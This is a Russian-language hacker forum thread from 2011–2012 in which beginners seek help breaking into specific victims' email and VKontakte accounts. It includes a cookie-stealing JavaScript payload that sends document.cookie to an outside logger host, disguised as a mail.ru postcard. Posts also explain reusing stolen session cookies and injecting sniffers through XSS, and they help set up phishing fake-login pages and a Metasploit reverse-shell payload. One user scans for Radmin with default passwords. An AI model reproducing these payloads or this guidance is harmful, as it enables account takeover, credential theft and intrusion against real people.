RE: Видео-курсы по взломам (новичкам)
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
RE: Видео-курсы по взломам (новичкам) - 2011-12-10 18:55:41.653333
|
|
|
Barkass$
Сообщений: 1854
Оценки: 40
Присоединился: 2008-11-11 12:19:45.216666
|
quote:
Barkass$ У меня к тебе вопрос,ну и ко всем кто может помочь … По поводу снифера… 1) Где можно найти ту открытку? 2)А эта фишка с открыткой только на рамблер действует?
Видео то старое, защиты обновляется, в прочем как и метода. Надо разбераться. Как ни будь сделаю видео посвежее) Действует на всех почтовиках
quote:
1. только с оперы можно эта сделать ? делаю все как на видео но что-то не какие куки не приходят в лог (пытался с мазылы, и хрома)
2. этот сниффер только для mail.ru можно использовать, или для yandex тоже подойдет ?
3. и как эти куки потом расшифровать ? как в них найти допустим аккаунт от контакта жертвы, или от мыла ?
1. С любова браузера. Он тут не причем.
2. Для любова почтовика подойдет
3. Их не нужно расшифровывать. Просто вбиваем их в нашем браузере, заменяя свои куки данной страницы, на куки жертвы.
|
|
|
|
|
RE: Видео-курсы по взломам (новичкам) - 2011-12-11 05:36:13.526666
|
|
|
rundoc
Сообщений: 3
Оценки: 0
Присоединился: 2011-10-14 16:48:34.413333
|
Всем привет :) Народ можно ли скачать видео через батник/cmd ? пример на до скачать
http://www.youtube.com/watch?v=HnLecIm5MbY&feature=fvst
без всяких тама downloaderov
|
|
|
|
|
RE: Видео-курсы по взломам (новичкам) - 2011-12-11 05:42:35
|
|
|
Barkass$
Сообщений: 1854
Оценки: 40
Присоединился: 2008-11-11 12:19:45.216666
|
Тебе для чего? Собственного удобства, или для закачки на удаленную машину? Вообще нет, нельзя, т.к. у батника нету таких расширенных возможностей работы с запросами. Можно подобную вещь реализовать на любом языке программирования. Если же тебе все таки нужен 2 вариант, то можно, только там все немного геморнее, т.к. сначало лучше самому скачать видео -> потом залить его на хост -> и с хоста залить батником на удаленную машину. Если у тебя какая-то другая идея, то расжуй её более конкретней
|
|
|
|
|
RE: Видео-курсы по взломам (новичкам) - 2011-12-11 14:33:07.940000
|
|
|
sdvphwe
Сообщений: 20
Оценки: 0
Присоединился: 2011-11-29 11:16:47.123333
|
Barkass$ привет еще раз! пробую все так как на видео, только теперь в лог приходит, версии браузеров с которых я пытаюсь сделать ну печенье так и не приходит.. может в открытке нада что то еще добовлять ? кроме
<script>
img = new Image(); img.src = "http://httpz.ru/n5y1fdxco4y.gif?"+document.cookie;
// редирект через 3 сек.
var URL = "http://images.cards.mail.ru/11bolprivet.jpg"
var speed = 3000;
function reload() {
document.location = URL
}
setTimeout("reload()", speed);
</script>
жду ответа ! )
|
|
|
|
|
RE: Видео-курсы по взломам (новичкам) - 2011-12-11 21:45:47.336666
|
|
|
okdaokda
Сообщений: 2
Оценки: 0
Присоединился: 2011-12-06 19:44:57.620000
|
тоже самое, куки не приходят. что делать? или это уже этот сниффер не работает?
|
|
|
|
|
RE: Видео-курсы по взломам (новичкам) - 2011-12-13 05:35:04.390000
|
|
|
Barkass$
Сообщений: 1854
Оценки: 40
Присоединился: 2008-11-11 12:19:45.216666
|
Сниффер работает, обесчаю сегодня разобраться в новшествах)
|
|
|
|
|
RE: Видео-курсы по взломам (новичкам) - 2011-12-13 08:56:08.083333
|
|
|
Barkass$
Сообщений: 1854
Оценки: 40
Присоединился: 2008-11-11 12:19:45.216666
|
Так, ну в общем потестил я сниффер. Отвечаю на ваши вопросы:
1. Сам сниффер работает идеально.
2. jаvаsсriрt код с редиректом временно не работает, потому что на всех почтовиках пофиксили уязвимость на форматы img, и вообще на яву подобного рода, т.к. теперь её можно скачивать + почтовик не обрабатывает сам скрипт. Как сказал quote:
sdvphwe , в лог приходит только IP и версия браузера. Тестил в других местах, все работает идеально.
3. jаvаsсriрt код для адресной строки - работает, но это конечно хрень, ибо придется просить человека вбить скрип в адресную строку.
4. Активные XSS и пасивные XSS - работают, если какой ни будь добрый человек, проявит желание и скинет мне в личку любую ХСС на почтовике, то я запишу урок и будет вам наглядность работы с ними. Самому искать просто лень. Возможно когда напишу небольшую програмку, по поиску их, будет проще, и тогда уже могу только сказать:- ожидайте :)
bb и HТМL код - не тестил.
|
|
|
|
|
RE: Видео-курсы по взломам (новичкам) - 2011-12-13 14:28:54.450000
|
|
|
sdvphwe
Сообщений: 20
Оценки: 0
Присоединился: 2011-11-29 11:16:47.123333
|
quote:
2. jаvаsсriрt код с редиректом временно не работает, потому что на всех почтовиках пофиксили уязвимость на форматы img, и вообще на яву подобного рода, т.к. теперь её можно скачивать + почтовик не обрабатывает сам скрипт.
Тоесть пока можно забыть временно про сниффер ?
и еще, а вот если просто формат jpg сделать так не прокатит ? или нужно только img .
quote:
Тестил в других местах, все работает идеально.
в других это в каких )) ?
я думаю что просто вариант jаvаsсriрt код с редиректом , самый оптимальный для меня, так как с jаvаsсriрt код для адресной строки
это точно не прокатит с моей жертвой ни чего вбитвать не будет точно, Активные XSS и пасивные XSS это я уже сам не разберусь ) ..
bb и HТМL тоже не то наверно… придеться брать серп и молот ))) других вариантов я не вижу =(
|
|
|
|
|
RE: Видео-курсы по взломам (новичкам) - 2011-12-13 15:19:50.596666
|
|
|
Barkass$
Сообщений: 1854
Оценки: 40
Присоединился: 2008-11-11 12:19:45.216666
|
Сниффер служит для разных дел, не только для взлома, но в вашем случае если интересует только jаvаsсriрt код с редиректом, тогда да. Еще как Очень хороший вариант - это XSS. Это даже лучше чем jаvаsсriрt код с редиректом. Лично я считаю. Суть XSS в том что (обьясняю по русски) на сайте в любом месте может быть баг, т.е. в погоде, в новостях, в мире и т.д., и грубо говоря ты можешь в эту багнутую ссылку,вставить свой скрипт на сниффер. Вся фишка в том что ссылка от этого не изменяется, т.е. даже самый опытный пользователь в принципе ничего не заподозрит, т.к. ссылка является реальной, без всяких там добавлений. HТМL и bb вам не помогут, т.к. они служат только для форумов и т.д. В принципе можно и серпом с молотом, это кому как удобней. Почтовики тоже защиту поставили, т.е. когда нажимаешь на файл скрипта, его можно открыть и скачать, а раньше он без запроса, в формате img сам открывался в браузере, т.е. это практически был 100% яд для жертвы. В формате jpg не покатит, нужно использовать те форматы, которые сможет открыть браузер и запустить скрипт. Обьясню по пальцам: Если вы на формат .ехе, поставите jpg, файл откроется как картинка, но сам .exe при этом не запустится.
|
|
|
|
|
RE: Видео-курсы по взломам (новичкам) - 2011-12-13 15:45:44.290000
|
|
|
sdvphwe
Сообщений: 20
Оценки: 0
Присоединился: 2011-11-29 11:16:47.123333
|
спс все так то понятно обьяснил ! _ значит щас буду разбираться с xss … а не знаеш есть на форуме что нибудь про xss ? просто пока не имею представления что он для чего он и как он )
и как думаеш в какую сторону мне лудче копать, для взлома почты ? в принцепе мне то нужно страничку вскрыть в контакте..вот я думаю вк так просто не возьмеш а если почту вскрыть там уже и о контакте думать можно. с фейком тоже не прокатило видно вконтакте не дает по ней пройти да и подопытный кролик не такой дурак что юы переходить по ней … брут тоже все не то. с моими 6 кб\с вобще сложно что придумать даже видео для новичков не грузит [>:]
|
|
|
|
|
RE: Видео-курсы по взломам (новичкам) - 2011-12-13 16:15:16.150000
|
|
|
sdvphwe
Сообщений: 20
Оценки: 0
Присоединился: 2011-11-29 11:16:47.123333
|
извеняюсь за невнимательность !quote:
а не знаеш есть на форуме что нибудь про xss ? просто пока не имею представления что он для чего он и как он )
есть уже тема про xss ))
|
|
|
|
|
RE: Видео-курсы по взломам (новичкам) - 2011-12-13 16:16:30.256666
|
|
|
Barkass$
Сообщений: 1854
Оценки: 40
Присоединился: 2008-11-11 12:19:45.216666
|
Угу) вот она http://forum.xakep.ru/m_1298634/tm.htm
А вообще в сети очень много информации про XSS. И там на самом деле все очень просто. Просто эта процедура занимает значительное кол-во времени, но оно того стоит.
|
|
|
|
|
RE: Видео-курсы по взломам (новичкам) - 2011-12-13 16:20:16.986666
|
|
|
sdvphwe
Сообщений: 20
Оценки: 0
Присоединился: 2011-11-29 11:16:47.123333
|
а для этой процедуры не требуеться скоростной инет ? с моими 6 кб\с можно чудо сотворить ? )
|
|
|
|
|
RE: Видео-курсы по взломам (новичкам) - 2011-12-13 17:14:17.743333
|
|
|
Barkass$
Сообщений: 1854
Оценки: 40
Присоединился: 2008-11-11 12:19:45.216666
|
Да легко, максимум что вам будет нужно - это лазить по страницам, и вбивать в конец ссылки стрипт, который покажет, есть XSS или нету. Рано или поздно, вы найдете XSS. Он были всегда, есть и будут.
|
|
|
|
|
RE: Видео-курсы по взломам (новичкам) - 2011-12-13 18:05:34.033333
|
|
|
sdvphwe
Сообщений: 20
Оценки: 0
Присоединился: 2011-11-29 11:16:47.123333
|
прочитал я про xss ) лудче бы наверно не читал ) даже не понел для чего нужна программа А4 прокси. и куда в писывать эти скрипты, где искать всякие <>?<{}{}:"*&^%*_@*# символы. "толи я дурочек толи лыжи не едут " лудче буду ждать и надеяться пока вам скинут в личку xss и вы запишите dидео урок, так как написанно тут ! http://forum.xakep.ru/m_1298634/tm.htm не для новичков а уже для более расшариных и имеющих предстовления о xss людей
|
|
|
|
|
RE: Видео-курсы по взломам (новичкам) - 2011-12-13 20:15:09.810000
|
|
|
Barkass$
Сообщений: 1854
Оценки: 40
Присоединился: 2008-11-11 12:19:45.216666
|
В принципе, если время будет До выходных, то я сам поищу. Возможно меня угостят добрые люди печенькой.
|
|
|
|
|
RE: Видео-курсы по взломам (новичкам) - 2011-12-13 20:18:23.910000
|
|
|
sdvphwe
Сообщений: 20
Оценки: 0
Присоединился: 2011-11-29 11:16:47.123333
|
Было бы отлично !
|
|
|
|
|
RE: Видео-курсы по взломам (новичкам) - 2011-12-16 18:33:01.440000
|
|
|
vint352
Сообщений: 2
Оценки: 0
Присоединился: 2011-12-16 11:02:14.976666
|
Barkass$ привет,кинь свою асю в личку,есть вопросы)
|
|
|
|
|
RE: Видео-курсы по взломам (новичкам) - 2011-12-19 07:16:07.920000
|
|
|
Barkass$
Сообщений: 1854
Оценки: 40
Присоединился: 2008-11-11 12:19:45.216666
|
404-450-417 Аська по вопросам данного топика.
|
|
|
|
|
RE: Видео-курсы по взломам (новичкам) - 2011-12-23 23:01:08.893333
|
|
|
MICHIU
Сообщений: 39
Оценки: 0
Присоединился: 2011-12-20 18:07:12.523333
|
+ то что надо
|
|
|
|
|
RE: Видео-курсы по взломам (новичкам) - 2012-01-04 16:33:23.340000
|
|
|
Gloria779
Сообщений: 2
Оценки: 0
Присоединился: 2012-01-04 16:23:11.570000
|
Народ подскажите пожалуйста через 3g(модем) можно провести такую операцию как "Вторжение на чужой комп"?
|
|
|
|
|
RE: Видео-курсы по взломам (новичкам) - 2012-01-04 16:42:07.696666
|
|
|
Gloria779
Сообщений: 2
Оценки: 0
Присоединился: 2012-01-04 16:23:11.570000
|
Я пробывал этот метод: Через XPider сканил порты (4899) находил уязвимые запускал радмин и пробывал заходить.. Ничего не вышло по дефолту вводил пороль 12345678 всё равно не получалось.
|
|
|
|
|
RE: Видео-курсы по взломам (новичкам) - 2012-01-05 13:20:16.580000
|
|
|
Barkass$
Сообщений: 1854
Оценки: 40
Присоединился: 2008-11-11 12:19:45.216666
|
quote:
Народ подскажите пожалуйста через 3g(модем) можно провести такую операцию как "Вторжение на чужой комп"
Собственно, а как разница какой оператор или провайдер будет предоставлять инет? Это суть дела не меняет. Конечно можно.
quote:
Я пробывал этот метод: Через XPider сканил порты (4899) находил уязвимые запускал радмин и пробывал заходить.. Ничего не вышло по дефолту вводил пороль 12345678 всё равно не получалось.
Ну так ессно, пароль на радмин везде разный.
|
|
|
|
|
RE: Видео-курсы по взломам (новичкам) - 2012-01-08 21:24:33.340000
|
|
|
zoha2011
Сообщений: 30
Оценки: 0
Присоединился: 2011-02-14 16:21:13.020000
|
перезалейте пожалуйста всё видео и проги
|
|
|
|
|
RE: Видео-курсы по взломам (новичкам) - 2012-01-09 14:33:52.430000
|
|
|
RusGus
Сообщений: 2
Оценки: 0
Присоединился: 2011-12-27 22:00:03.300000
|
на сайт с фейком не пускает Mail.Ru и Web of Trust, как обойти или где найти нормальный хост?
|
|
|
|
|
RE: Видео-курсы по взломам (новичкам) - 2012-01-12 19:33:40.956666
|
|
|
WailD54
Сообщений: 7
Оценки: 0
Присоединился: 2012-01-12 19:13:29.890000
|
quote:
И так. Первый пост :)
Сегодня я затрону, старый, добрый Metasploit.
Метод старый, я бы даже сказал, древний … но суть остается сутью. До сих пор Metasploit работает, работает, и еще раз работает.
~~~~~~~~~~~~~~~~~~~~~~~~
Качаем: http://dump.ru/file/4385085
~~~~~~~~~~~~~~~~~~~~~~~~
http://rapidshare.com/files/357898202/Metasploit.exe.html
~~~~~~~~~~~~~~~~~~~~~~~~
p.s. Все вопросы связанные с видео-роликами пишите в ICQ либо PM.
~ Вся база видео =>> http://nosteus.do.am
Скачал с офф сайта Metasploit, установил, а когда дело дошло до Cygwin Sheel, то не смог найти этот файл. Там есть только dev_shell.bat и diagnostic_shell.bat . Версия последняя.
|
|
|
|
|
RE: Видео-курсы по взломам (новичкам) - 2012-01-13 07:24:16.363333
|
|
|
Barkass$
Сообщений: 1854
Оценки: 40
Присоединился: 2008-11-11 12:19:45.216666
|
quote:
перезалейте пожалуйста всё видео и проги
Видео все перезалито, ссылки в 1 посте.
quote:
Скачал с офф сайта Metasploit, установил, а когда дело дошло до Cygwin Sheel, то не смог найти этот файл. Там есть только dev_shell.bat и diagnostic_shell.bat . Версия последняя.
В новых версиях меты, Другая консолька и другие базы. Будет время скачаю, разберусь :)
|
|
|
|
|
RE: Видео-курсы по взломам (новичкам) - 2012-01-16 23:08:03.173333
|
|
|
Кэмбоу
Сообщений: 10
Оценки: 0
Присоединился: 2012-01-15 18:02:36.006666
|
Ребят, подскажите, боролся с Метасплоитом, так и не понял, в чем причина, ставил значит различные версии 3.3.3 - 3.3.4 + самую новую, антивирус отключал, тестил на 3-х разных машинах, Win 7 - x64 + виртуалка Win 7 x32.
Предварительно открываю Metasploit Update жду где-то секунд 20 табличка закрывается.
Запускаю значит Shell, появляется:
Ввожу: msfpayload windows/meterpreter/reverse_tcp LHOST=ВАШ IP x>_процесс_.exe И вижу:
Бился бился, так и не понял, как решить проблему, подскажите, дайте идей, любых!
|
|
|
|
|
RE: Видео-курсы по взломам (новичкам) - 2012-01-21 04:22:21.600000
|
|
|
WailD54
Сообщений: 7
Оценки: 0
Присоединился: 2012-01-12 19:13:29.890000
|
quote:
Ребят, подскажите, боролся с Метасплоитом, так и не понял, в чем причина, ставил значит различные версии 3.3.3 - 3.3.4 + самую новую, антивирус отключал, тестил на 3-х разных машинах, Win 7 - x64 + виртуалка Win 7 x32. Предварительно открываю Metasploit updаtе жду где-то секунд 20 табличка закрывается. Запускаю значит Shell, появляется: Ввожу: msfpayload windows/meterpreter/reverse_tcp LHOST=ВАШ IP x>_процесс_.exe И вижу: Бился бился, так и не понял, как решить проблему, подскажите, дайте идей, любых!
Смотри пост выше. Barkass$ на какой хостинг выкладывал фейк? (авторизация mail.ru)
|
|
|
|
|
RE: Видео-курсы по взломам (новичкам) - 2012-01-21 05:42:25.696666
|
|
|
Barkass$
Сообщений: 1854
Оценки: 40
Присоединился: 2008-11-11 12:19:45.216666
|
В принципе, любой хостинг с поддержкой PHP 3.x.x подойдет для этого дела. Желательно выберать такой, где дают "красивые" домены, ибо тем самым ссылка на фейк начинает казаться более реальной\настоящей. У меня в наличии нету каких-то определенных хостингов, так что поищите сами пожалуйста, и если найдете какую либо полезность, выложите тут результат :)
|
|
|
|
|
RE: Видео-курсы по взломам (новичкам) - 2012-01-21 06:34:38.313333
|
|
|
WailD54
Сообщений: 7
Оценки: 0
Присоединился: 2012-01-12 19:13:29.890000
|
quote:
В принципе, любой хостинг с поддержкой PHP 3.x.x подойдет для этого дела. Желательно выберать такой, где дают "красивые" домены, ибо тем самым ссылка на фейк начинает казаться более реальной\настоящей. У меня в наличии нету каких-то определенных хостингов, так что поищите сами пожалуйста, и если найдете какую либо полезность, выложите тут результат :)
Пока создал на http://www.webservis.ru/. Загрузил все файлы (кроме разумеется test5). Авторизировался на созданном сайте и мне пишет:Warning: Unknown(): open_basedir restriction in effect. File(/home/vipcentr/m/a/l/mall/public_HТМL/login.php) is not within the allowed path(s): (/nonexistent) in Unknown on line 0
Warning: Unknown(/home/vipcentr/m/a/l/mall/public_HТМL/login.php): failed to open stream: Operation not permitted in Unknown on line 0
Warning: (null)() [function.include]: Failed opening '/home/vipcentr/m/a/l/mall/public_HТМL/login.php' for inclusion (include_path='.:/usr/local/share/pear') in Unknown on line 0 P.S: логин и пароль при этом не приходят.
P.S.S: в php сменил адрес на http://e.mail.ru/cgi-bin/msglist?back=1
|
|
|
|
|
RE: Видео-курсы по взломам (новичкам) - 2012-01-21 10:20:12.726666
|
|
|
Barkass$
Сообщений: 1854
Оценки: 40
Присоединился: 2008-11-11 12:19:45.216666
|
Права на файлы выставили? В правильные директории на хостинге запихали?
|
|
|
|
|
RE: Видео-курсы по взломам (новичкам) - 2012-01-21 15:44:32.806666
|
|
|
WailD54
Сообщений: 7
Оценки: 0
Присоединился: 2012-01-12 19:13:29.890000
|
quote:
Права на файлы выставили? В правильные директории на хостинге запихали?
Там нет такой функции. Вообще в файл мененджере можно только удалять файлы, преименновывать их и переписывать скрипты. Сейчас попробую через FileZilla что-нибудь сделать.
|
|
|
|
|
RE: Видео-курсы по взломам (новичкам) - 2012-01-21 16:05:48.666666
|
|
|
WailD54
Сообщений: 7
Оценки: 0
Присоединился: 2012-01-12 19:13:29.890000
|
Выставил права, всё также выводит ошибку. Возможно из-за того что кидать login.php надо в недоступную с FZ папку php. Попробую сделать фейк на redz.
|
|
|
|
|
RE: Видео-курсы по взломам (новичкам) - 2012-01-21 16:15:18.310000
|
|
|
WailD54
Сообщений: 7
Оценки: 0
Присоединился: 2012-01-12 19:13:29.890000
|
Всё заработало! Спасибо огромное за видео.
P.S: Извини, но не могу поставить +2 в репутацию.
|
|
|
|
|
RE: Видео-курсы по взломам (новичкам) - 2012-01-21 20:44:17.250000
|
|
|
Barkass$
Сообщений: 1854
Оценки: 40
Присоединился: 2008-11-11 12:19:45.216666
|
Ничего страшного :) будут вопросы, обращайтесь.
|
|
|
|
|
RE: Видео-курсы по взломам (новичкам) - 2012-01-24 06:13:31.690000
|
|
|
Shadowfolder
Сообщений: 6
Оценки: 0
Присоединился: 2012-01-23 22:23:06.933333
|
дайте кто нибудь инфу по CRLF иньекциям или напишит кто нибудь статейку плиз!
а то на русском мало инфы.
|
|
|
|
|
RE: Видео-курсы по взломам (новичкам) - 2012-01-28 10:29:47.913333
|
|
|
Novi4ec
Сообщений: 2
Оценки: 0
Присоединился: 2012-01-27 22:35:49.876666
|
Баркасс, когда планируешь делать видео по XSS для маил.ру? очень нужно…
|
|
|
|
|
RE: Видео-курсы по взломам (новичкам) - 2012-01-28 12:29:25.650000
|
|
|
Barkass$
Сообщений: 1854
Оценки: 40
Присоединился: 2008-11-11 12:19:45.216666
|
Так вы мне их дайте. Уважаемые читатели :) У меня нету времени заниматься их поиском.
Хотя бы 1 пасивку и активку.
|
|
|
|
|
RE: Видео-курсы по взломам (новичкам) - 2012-01-29 05:18:38.270000
|
|
|
Digi228
Сообщений: 2
Оценки: 0
Присоединился: 2012-01-29 05:13:42.606666
|
Самая программа нормальная для взломов через TeamViewer http://depositfiles.com/files/ycn82arax
|
|
|
|
|
|
